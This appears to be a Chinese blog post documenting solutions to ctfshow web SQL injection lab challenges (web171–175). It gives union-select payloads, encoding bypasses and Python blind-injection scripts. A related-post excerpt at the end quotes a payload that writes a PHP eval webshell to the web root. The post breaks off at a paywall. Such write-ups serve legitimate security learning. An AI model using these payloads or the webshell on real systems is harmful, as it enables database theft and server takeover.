ctfshow web入门 sql注入做题记录

VIP文章 已于 2022-03-09 22:35:06 修改
阅读量1k 收藏 4
点赞数
分类专栏: ctfshow web入门 文章标签: sql 前端 数据库
于 2021-11-12 20:47:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ashmob/article/details/121295662
版权

ctfshow web入门 sql注入

前言,感谢y4师傅详尽的教程[CTFSHOW]SQL注入(WEB入门)_Y4tacker的博客-CSDN博客_ctfshow sql注入

sql注入的产生

php中对数据库的操作非常简化,只需要一串sql语句的字符串,之后将这个字符串传入mysql_query这个函数就能进行数据库的操作,因而如果对用户传入的参数不进行严格的过滤,或者通过预处理之类的手段严格限制传入的参数,就会造成sql注入漏洞,执行用户自定义的sql语句。

image-20211112184639541

MySQL5注入的一般流程:

获取字段数-查库名-查表名-查列名-查数据

获取字段数:order by 临界值
获取库名:database()
表名和列名没有内置函数 怎么查?

union语句:将不同表的两个列查询的数据去重拼接
union all :不去重

获取MySQL版本:version()
MySQL5.0以下版本只能和access数据库一样猜解
而MySQL5.0以上版本内置了information_schema库,存储了所有的数据库名、表名、列名
information_schema.tables 记录表名信息
information_schema.columns 记录列名信息
TABLE_SCHEMA 数据库字段
table_name 表名
column_name 列名
查表名:
SELECT table_name FROM information_schema.tables where TABLE_SCHEMA=database();
查列名:
SELECT column_name FROM information_schema.columns where TABLE_name=‘users’;
查数据:
select 列名 from 库名.表名

MySQL5以上的sql注入

分类的方式有很多,根据sql参数的类型可分为字符型和数字型。

根据传参的不同可分为:

  1. get型,较为常见的一个类型,php通过$_GET[]获得参数

  2. post型,类比与get型,通过$_POST[]获得sql参数

  3. cookie型,$_COOKIE[]

  4. http型,利用$_SERVER[]获取传入的http头部信息,处理之后传入sql语句拼接。

    一些讲解:

    X-Forwarded-For
    X-Forwarded-For是HTTP头的一个字段。它被认为是客户端通过HTTP代理或者负载均衡器连接到web服务端获取源ip地址的一个标准。类似的还有如下几种
    X-Originating-IP: 127.0.0.1
    X-Forwarded-For: 127.0.0.1
    X-Remote-IP: 127.0.0.1
    X-Remote-Addr: 127.0.0.1
    Client-IP: 127.0.0.1
    User-agent
    用户代理(user agent)是记录软件程序的客户端信息的HTTP头字段,他可以用来统计目标和违规协议。在HTTP头中应该包含它,这个字段的第一个空格前面是软件的产品名称,后面有一个可选的斜杠和版本号。并不是所有的应用程序都会被获取到user-agent信息,但是有些应用程序利用它存储一些信息(如:购物车)。在这种情况下,我们就有必要研究下user-agent头存在的问题了。
    Referer
    Referer是另外一个当应用程序没有过滤存储到数据库时,容易发生SQL注入的HTTP头。它是一个允许客户端指定的可选头部字段,通过它我们可以获取到提交请求URI的服务器情况。

    image-20211112191412553

    实例:

    一般先判断注入是数字型注入或者是字符型注入

    image-20211112192115421

    ?id=1+1如果成功返回数据则为数字型注入,如果在url后拼接?id=1 and 1=1orand 1=2分别正确错误则说明为字符型注入

    数字型:

    首先查字段
    url?id = 1 order by 3 不报错
    url?id = 1 order by 4 报错
    所以有三个字段
    接下来使用联合查询:url?id = 1 union select 1,2,3

    查当前数据库名,版本,用户
    url?id = 1 union select database(),version(),user()

    查询有什么表
    url?id = 1 union select 1,2,table_name from infomation_schema.tables where table_schema = database()

    查询列名:
    url?id = 1 union select 1,2,column_name from infomation_schema.columns where table_table = 'users'

    查询数据:
    url?id = 1 union select id,username,password from users

web171

//拼接sql语句查找指定ID用户
$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

一个字符串型注入,走一个流程

payload:

  1. 爆字段数:

    1' order by 4 --+

    此时报错,因而字段数为3

  2. 看回显位置

1' union select 1,2,3 --+

image-20211112194026984

  1. 得到回显,爆破当前数据库名,版本,用户

    1' union select database(),version(),user()--+

image-20211112194404448

  1. 查询当前数据库有什么表,因为表数量可能过多因而用group_concat来整合成一个

    1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

    image-20211112194801522

    可以看到只有一个ctfshow_user的表

  2. 查询表中的列名

    1'union select 1,2,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user' --+

image-20211112194938815

  1. 查询表中的数据

    1'union select id,username,password from ctfshow_user --+

image-20211112195048152

web172

$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//检查结果是否有flag
    if($row->username!=='flag'){
   
      $ret['msg']='查询成功';
    }

题目给出了这次的表是ctfshow_user2

直接查询就好,查询结果不能有flag,通过编码绕过to_base64(),hex()

1' union select to_base64(username),hex(password) from ctfshow_user2 --+

image-20211112200439698

Zmxh啥的一看就是flag,直接转码即可

web173

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
   
      $ret['msg']='查询成功';
    }

尝试编码绕过

-1' union select to_base64(id),to_base64(username),hex(password) from ctfshow_user3 --+

image-20211112201015936

web174

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

上题的思维是利用base64,会出现数字,群主给出的方法是利用replace从0-9用特殊单词进行替换,y4爷利用盲注直接梭了,

# @Author:Y4tacker
import requests

url = "http://e076200d-5e74-4121-b2fc-04153243f7a3.chall.ctf.show/api/v4.php?id=1' and "

result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        payload = f'1=if(ascii(substr((select  password from ctfshow_user4 limit 24,1),{i},1))>{mid},1,0) -- -'
        r = requests.get(url + payload)
        if "admin" in r.text:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

web175

//检查结果是否有flag
    if(!preg_match('/[\x00-\x7f]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

这里过滤了返回的结果中所有的ascii字符

没有回显了基本就尝试盲注,这里还有个解法二是用文件读取

盲注:

# @Author:Y4tacker
import requests

url = "http://25bc7c61-d36e-4ca2-9d01-6a75a5c08ee8.challenge.ctf.show/api/v5.php?id=1' and "

result = ''
i = 0

while True:
    i = i + 1
    head
最低0.47元/天 解锁文章
AshMOB
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL字符型注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
CTFshow-WEB入门-SQL注入()
feng的博客
02-08 1756
web199 很懵。。。把括号给过滤了,所以varchar(255)就不能用了,考虑改成其他的类型,但是不知道到底哪里出了问,每次一改不是没效果,就是查不出来东西。一旦alter出错就要重新启容器,很烦。 看了一下y4师傅的姿势,服了 1;show tables; ctfshow_user 对,最简单的方法,一直都没想起来,我太菜了。。。 web200 同上 web201 开始学习sqlmap的使用。 sqlmap的使用手册:sqlmap 不过因为是纯英文,英文太菜的我肯定看不太懂,不过也不需要多深入的
CTFshow web入门171-187
qzh3485535的博客
03-18 848
这里明确给出怎么找flag,就在password字段里面,旁边对应的字段是username的字段是flag。可以使用%0a(回车),括号,%09,%0c,%0d,%0b代替。\xnn的意思是ascii码为对应十六进制内容是nn的字符。把flag写到1.txt里面,然后访问得到flag。可以拿别的搞 /**/或者是%0a(这个是回车)一般来说都是在/var/www/html/在测试发现很多符号被过滤了,用不了。where ,单引号,反引号被过滤了。% 匹配任何数目的字符,包括零字符。
CTFSHOW WEB入门——sql注入
Chur的博客
07-22 3501
ctfshow 靶场 web入门 sql注入系列
CTFSHOW SQL注入篇(191-210)
羽的博客
06-07 1101
ctfshow sql
CTFshow——web入门——sql注入
h_adam的博客
03-14 5286
web入门——sql注入基础知识点判断是否注入order by 判断列数web171web172web173 基础知识点 判断是否注入 使用注释符–+ +代表的是空格 或者使用%23来做注释符 1' and 1=1%23 order by 判断列数 order by 是根据某一列进行排序 使用 1' order by 3--+ 返回正常 1' order by 4--+ 没有数据 说明列数是3 web171 本地测试,查询id为id = '9999' or id='3',9999不存在时会查询id=3
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
CTFshow_Web_SQL注入——web171~web190
Ho1aAs‘s Blog
04-08 1782
文章目录web 171web 172web 173web 174web 175web 176web 177web 178web 179web 180-182web 183web 184web 185-186web 187web 188web 189web 190完 web 171 基础 [GET]PAYLOAD: ?id=0' union select 1,2,password from ctfshow_user where username='flag' --+ web 172 过滤 flag
ctfshow学习记录-web入门sql注入181-190)
龟速更新的九某人
09-24 1879
ctfshow学习记录-web入门sql注入web181-web190)
BUUCTF web基础 SQL篇(二)
qq_60399102的博客
09-07 77
刷到报错注入这是,不看讲解是一点头绪也没有,根据别的大佬经验学到了使用burp来爆破过滤的字符串,同时注入语句在hackbar完成比较好,抓包也行,直接在给的表单提交会有一点问,也了解了一些报错原理,日后在同一做出一些总结吧。测试了一下闭合,ban了空格与许多关键字,这里可以使用URL编码来绕过空格,也可以使用括号,由于联合查询(union select)也被ban了,这时候可以试试报错注入。进去看见出者的提示,使用万能密码,先求闭合,可是语句报错,根据回显看到or被过滤了。拼凑一下得到flag。
CTFSHOW SQL注入篇(171-190)
羽的博客
06-07 2254
无过滤 前言 下面几道无过滤的都可以写入shell 然后蚁剑连上后从数据库里面找,具体做法如下 id=0' union select 1,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 有的是查询的三项所以payload是 id=0' union select 1,2,"<?php eval($_POST[1]);?>" into outfile "/var/www/html/1.php%23" 接着
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
Web安全SQL注入精讲视频.zip
04-16
1-1 SQL注入的业务场景以及危害.mp4 1-2 真实网站SQL注入是怎么样的.mp4 1-3 SQL为什么有那么多分类.mp4 2-1 整型注入.mp4 2-10 SQL注入读写文件.mp4 2-2 字符型注入(单引号、双引号、括号).mp4 2-3 POST注入....
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
Web安全之SQL注入
01-21
SQL注入是指将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。当Web应用程序的开发人员对用户所输入的数据不进行过滤或验证(即存在注入点...
pymysql +SQLAlchemy操作MySQL数据库(ORM)
最新发布
上庸者-不服周
04-19 94
SQLAlchemy是用Python编程语言开发的一个开源项目。它提供了SQL工具包和ORM(对象关系映射)工具,使用MIT许可证发行。SQLAlchemy采用简单的Python语言,提供高效和高性能的数据库访问,实现了完整的企业级持久模型。它的理念是SQL数据库的量级和性能比对象集合重要,而对象集合的抽象又重要于表和行。
解决方案:用决策树算法如何生成决策树图及生成SQL规则
weixin_42504788的博客
04-19 521
解决方案:用决策树算法如何生成决策树图及生成SQL规则
NL2SQL进阶系列(5):论文解读业界前沿方案(DIN-SQL、C3-SQL、DAIL-SQLSQL-PaLM)、新一代数据集BIRD-SQL解读
丨汀、的博客
04-15 374
NL2SQL进阶系列(5):论文解读业界前沿方案(DIN-SQL、C3-SQL、DAIL-SQL)、新一代数据集BIRD-SQL解读
数据库】MySQL分页查询
学习笔记,人工智能,教程,技术分享!
04-19 107
比如:size=10那么, page 和 size 记录范围 和 起始记录索引值 limit。limit offset(开始记录索引,是从0开始的),size(要取出的条数);通用的分页查询写法(page:页数,size:每页显示的记录条数)记住每页的起始记录索引值:(page-1)*size。案例:(查询有奖金且工资最高的前10名的员工信息)案例:(查询第11条到第25条)2页:11-20条 10,10。案例:(查询前5条员工数据)1页: 1-10条 0,10。where ....等等。
ctfshow web入门 sql注入
03-17
SQL注入是一种常见的网络安全漏洞,它通过提交非法的SQL语句来欺骗Web应用程序,访问或修改数据库的数据。通过在Web应用程序的输入字段插入恶意代码,攻击者可以绕过安全措施并获得不应该拥有的敏感信息。为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值